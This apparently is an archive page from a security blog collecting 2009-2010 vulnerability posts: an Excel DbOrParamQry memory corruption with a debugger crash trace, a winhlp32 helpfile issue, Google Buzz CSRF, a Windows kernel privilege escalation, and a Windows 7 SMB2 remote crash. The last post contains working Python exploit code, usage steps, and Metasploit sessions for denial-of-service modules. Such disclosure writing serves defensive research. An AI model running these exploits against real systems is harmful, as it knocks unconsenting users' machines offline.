Archive for the ‘Infosecurity’ Category
Tuesday, March 9th, 2010
Microsoft Office Excel > DbOrParamQry Record Parsing Vulnerability
Damian Frizza from Core Security Technologies discovered a memory corruption occurs on Microsoft Office Excel 2002 when parsing a .XLS file with a malformed DbOrParamQry record. This vulnerability could be used by a remote attacker to execute arbitrary code in the context of the currently logged on user, by enticing the user to open a specially crafted file.
Vulnerability Informations:
Class: Buffer overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: CVE-2010-0264
Affected Packages:
Microsoft Excel 2002 (Office XP SP3)
Proof of Concept:
According to the MSDN documentation the DbOrParamQry record specifies a DbQuery or ParamQry record depending on the preceding record. The Record Query Parameters (ParamQry) offset DCh, contains information about ODBC parameterized queries. This record has the following format:
1
2
3
| Offset Name Size Contents
4 wTypeSql 2 Used for ODBC queries; the parameter SQL type
6 flags 2 Option flags |
By modifying this record an exploitable condition can be triggered. An excerpt of the vulnerable code follows:
1
2
3
4
5
6
7
8
9
10
11
12
13
| EXCEL!Ordinal41+2c20ce:
302c20ce 8b461c mov eax,[esi+0x1c] ds:0023:0180aa98=0197013c
302c20d1 85c0 test eax,eax
302c20d3 0f84e1000000 je EXCEL!Ordinal41+0x2c21ba (302c21ba) [br=0]
302c20d9 8b08 mov ecx,[eax] ds:0023:0197013c=00010001
302c20db 50 push eax
302c20dc ff5108 call dword ptr [ecx+0x8] ds:0023:00010009=5c003a00
Access violation - code c0000005 (first chance)
eax=0197013c ebx=00000001 ecx=00010001 edx=0000014c esi=0180aa7c edi=00000000
eip=5c003a00 esp=001363ec ebp=00136400 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
5c003a00 ?? ??? |
Vendors:
Microsoft Security Bulletin MS10-017
MSDN DbOrParamQry entry
References:
Core Security Technologies
Tags: coresecurity, CVE-2010-0264, DbOrParamQry, excel 2002, microsoft office excel, query, Record Parsing Vulnerability, RPV, sp3, Windows, xp
Posted in Hacking, Infosecurity, PoC, Windows | 1 Comment »
Thursday, February 25th, 2010
Introduction:
This vulnerability regards to invoke winhlp32.exe,the Microsoft Windows Help File viewer, from Internet Explorer 6,7,8 using VBScript. Passing malicious .HLP file to winhlp32 could allow remote attacker to run arbitrary command.
Additionally, there is a stack overflow vulnerability in winhlp32.exe.
Proof of Concept:
To trigger vulnerability some user interaction is needed. Victim has to press F1 when MsgBox popup is displayed.
1
| MsgBox(prompt[,buttons][,title][,helpfile,context]) |
It is possible to pass remote samba share as helpfile parameter. In addition there is a stack based buffer overflow when helpfile parameter is too long. However, on XP winhlp32.exe is compiled with
/GS flag, which in this case effectively guard the stack.
Example of this exploiting.
Affected Systems:
Windows XP with Service Pack 3
Not Affected Systems:
Vista, Windows 7
Impact:
Value: MEDIUM
The vulnerability allows remote attacker to run arbitrary code on victim machine.
Related sources:
Isec Security Research
Tags: 6, 7, 8, exploit, helpfile, ie rce, PoC, remote, samba, stack overflow, vb, winhlp32, xp sp3
Posted in Articles, Exploits, Hacking, Infosecurity, PoC | Comments Off
Friday, February 12th, 2010
Google Buzz CSRF Vulnerabilities
Google Buzz is a new way to start conversations about the things you find interesting, provided by Google Inc.
However, it is also quite vulnerable to persistent CSRF attacks when data is pulled from external data feeds.
Kristian Hermansen‘ proof-of-concept executes a denial of service against Google Buzz users for which the only recovery is to disable IMG tag loading,
reload Google Buzz, and either “mute” the posting or unfollow permanently.
Sources:
PacketStorm – Advisories
Secunia – Disclosure
Tags: advisory, buzz, cross site request forgery, csrf, full disclosure, google, persistent, secunia, vulnerabilities
Posted in Hacking, Infosecurity, News | 1 Comment »
Saturday, January 23rd, 2010
Microsoft shocked : Local Privilege Escalation in Windows Kernel.
Do you remember Google vs China? Remember bugs that have allowed Chinese hackers to enter into Gmail accounts and access to confidential information?
Microsoft has confirmed a privilege-escalation vulnerability in the Windows kernel, one day after a Google engineer posted details of the flaw to the Full Disclosure mailing list.
Systems Affected :
All supported versions of 32-bit Windows, while 64-bit versions, which includes Windows Servers 2008 R2, are not impacted.
Details :
Vulnerability is difficult to exploit, the risk for users is low, and the software giant is not aware of any public attacks exploiting the flaw.
To exploit this vulnerability, an attacker must already have a local access to the system, then elevate their privileges to the administrative level and run programs of their choice on the system.
Advisory + sploit : (external link)
KiTrap0D
Internet Explorer – Remote Code Execution Vulnerability
Microsoft is issuing on January 21 an out-of-band fix for the Internet Explorer security breach that affected Google and other companies in China.
Tags: 0-day, china, google, google vs china, ie rce, privilege escalation, windows kernel
Posted in Articles, Hacking, Infosecurity, News | 1 Comment »
Monday, November 16th, 2009
Windows 7 and Windows Server 2008 R2 Remote Kernel Crash Exploit
Windows 7 and Windows Server 2008 R2, with the very latest patches applied, are affected of this vulnerability. A link to a server running this code could easily be embedded in a web page or email, pointing out to a poison host on the internet, so this exploit is not isolated to corporate networks doing file sharing. It’s tested on the affected operating systems, fully patched as of 12 Nov 2009.
This affects hosts whatever version of SMB they are running.
It has no mechanism for propagation, the vulnerability does not have the potential to steal information or compromise system integrity, but it crashes hosts ( IPv4 and IPv6 )
Exploiting
On a linux machine, ensure that port 445 is open or that your firewall is down and the target windows host and the linux host have connectivity, then python w7spolit.py. You need be root to open a tcp service, on the target Windows box, do a “net use x.x.x.x”, where x.x.x.x is the ip address of the linux box.
Proof of Concept (Sploit)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
| #win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure()
caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast from the target: \\this_script_ip_addr\BLAH , instantly
crash
#Author: <a href="http://twitter.com/g_laurent">Laurent Gaffiè</a>
#
import SocketServer
packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
print "Who:", self.client_address
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()
launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port
445
launch.serve_forever()
#SDL FAILED |
Metasploit Module
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
| #
# Root access is needed to run a service on port 445
#
$ sudo msfconsole
=[ metasploit v3.3-rc1 [core:3.3 api:1.0]
+ -- --=[ 441 exploits - 216 auxiliary
+ -- --=[ 190 payloads - 21 encoders - 8 nops
=[ svn r7470 updated today
msf > use auxiliary/dos/windows/smb/smb2_negotiate_response_loop
msf auxiliary(smb2_negotiate_response_loop) > run
[*] Starting the malicious SMB service...
[*] To trigger, the vulnerable client should try to access: \\192.168.0.136\Shared\Anything
[*] Server started.
#
# MS09-065 PoC
#
$ msfconsole
=[ metasploit v3.3-rc1 [core:3.3 api:1.0]
+ -- --=[ 441 exploits - 216 auxiliary
+ -- --=[ 190 payloads - 21 encoders - 8 nops
=[ svn r7470 updated today
msf > use auxiliary/dos/windows/browser/ms09_065_eot_integer
msf auxiliary(ms09_065_eot_integer) > set URIPATH /eot
URIPATH => /eot
msf auxiliary(ms09_065_eot_integer) > run
[*] Using URL: http://0.0.0.0:8080/eot
[*] Local IP: http://192.168.0.136:8080/eot
[*] Server started.
(send the target to http://A.B.C.D:8080/eot/) |
Patch
There is no host based mitigation available. You have to not browse indiscriminately from your workstation and you can disable SMB service and ports.
Referers
FullDisclosure – Seclists
SANS Institute
Tags: affected, exploit, ipv4, ipv6, link, remote, remote kernel crash, smb, sploit, windows 7, windows server 2008 r2
Posted in Exploits, Hacking, Infosecurity, PoC, Webappsec, Windows | Comments Off
